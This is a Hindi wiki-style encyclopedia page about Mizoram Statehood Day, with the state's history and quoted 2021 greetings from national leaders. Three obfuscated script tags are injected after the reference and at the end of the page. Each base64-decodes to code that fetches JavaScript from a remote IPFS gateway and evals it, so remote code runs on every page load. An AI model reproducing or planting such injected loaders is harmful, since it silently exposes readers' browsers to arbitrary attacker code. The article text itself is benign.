मिज़ोरम स्थापना दिवस

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 05:26, 20 फ़रवरी 2021 का अवतरण (''''मिज़ोरम स्थापना दिवस''' प्रत्येक वर्ष 20 फ़रवरी को...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

मिज़ोरम स्थापना दिवस प्रत्येक वर्ष 20 फ़रवरी को मनाया जाता है। फ़रवरी, 1987 को मिज़ोरम भारत का 23वां राज्‍य बना था। 1972 में केंद्रशासित प्रदेश बनने से पहले तक यह असम का एक ज़िला था। मिज़ोरम में प्राकृतिक सौंदर्य बिखरा पड़ा है तथा इस क्षेत्र में प्रकृति की विभिन्‍न छटाएं देखने को मिलती हैं।

इतिहास

सन 1891 में ब्रिटिश शासन में जाने के बाद कुछ वर्षो तक उत्‍तर का लुशाई पर्वतीय क्षेत्र असम के और आधा दक्षिणी भाग पश्चिम बंगाल के अधीन रहा। 1898 में दोनों को मिलाकर एक ज़िला बना दिया गया, जिसका नाम 'लुशाई हिल्‍स ज़िला' पड़ा। यह असम के मुख्‍य आयुक्‍त के प्रशासन में आ गया। सन 1972 में पूर्वोत्‍तर क्षेत्र पुनर्गठन अधिनियम लागू होने पर मिज़ोरम केंद्रशासित प्रदेश बन गया। भारत सरकार और मिज़ो नेशनल फ्रंट के बीच 1986 में हुए ऐतिहासिक समझौते के फलस्‍वरूप 20 फ़रवरी, 1987 को इसे पूर्ण राज्‍य का दर्जा दिया गया।

शुभ संदेश

  • प्रधानमंत्री नरेंद्र मोदी ने शनिवार (20 फ़रवरी, 2021) को अरुणाचल प्रदेश और मिज़ोरम के स्थापना दिवस पर वहां के लोगों को बधाई दी और दोनों राज्यों की संस्कृति तथा परंपरा की सराहना की। दोनों राज्यों का गठन 20 फ़रवरी, 1987 को हुआ था। पीएम मोदी ने ट्वीट किया, "अरुणाचल प्रदेश के लोगों को राज्य स्थापना दिवस के मौके पर बधाई। इस राज्य के लोगों को उनकी संस्कृति, साहस और भारत के विकास की दिशा में मजबूत प्रतिबद्धता के लिए जाना जाता है। कामना है कि अरुणाचल प्रदेश प्रगति की नयी ऊंचाइयों को हासिल करे"।[1]
  • पीएम मोदी ने एक अन्य ट्वीट में कहा, "मिज़ोरम के स्थापना दिवस पर वहां रहने वाले बहनों और भाइयों को मेरी शुभकामनाएं। समूचे देश को अनूठी मिज़ो संस्कृति पर गर्व है। मिज़ोरम के लोगों को उनकी दयालुता और विनम्र स्वभाव के लिए जाना जाता है। राज्य के निरंतर विकास की कामना करता हूं"।
  • पीएम मोदी के साथ ही केंद्रीय गृह मंत्री अमित शाह ने भी अरुणाचल प्रदेश के स्थापना दिवस पर यहां के लोगों को बधाई दी। शाह के कहा कि "उगते सूरज की भूमि अपनी समृद्ध सांस्कृतिक विरासत और देशभक्ति की भावना के लिए जानी जाती है"।
  • लोकसभा अध्यक्ष ओम बिरला ने भी ट्वीट कर राज्य के स्थापना दिवस पर बधाई दी। पीएम मोदी के ट्वीट पर अरुणाचल प्रदेश की सीएम ने उनका आभार व्यक्त किया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. प्रधानमंत्री मोदी ने अरुणाचल प्रदेश, मिजोरम के स्थापना दिवस पर लोगों को बधाई दी (हिंदी) navbharattimes.indiatimes.com। अभिगमन तिथि: 20 फ़रवरी, 2020।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>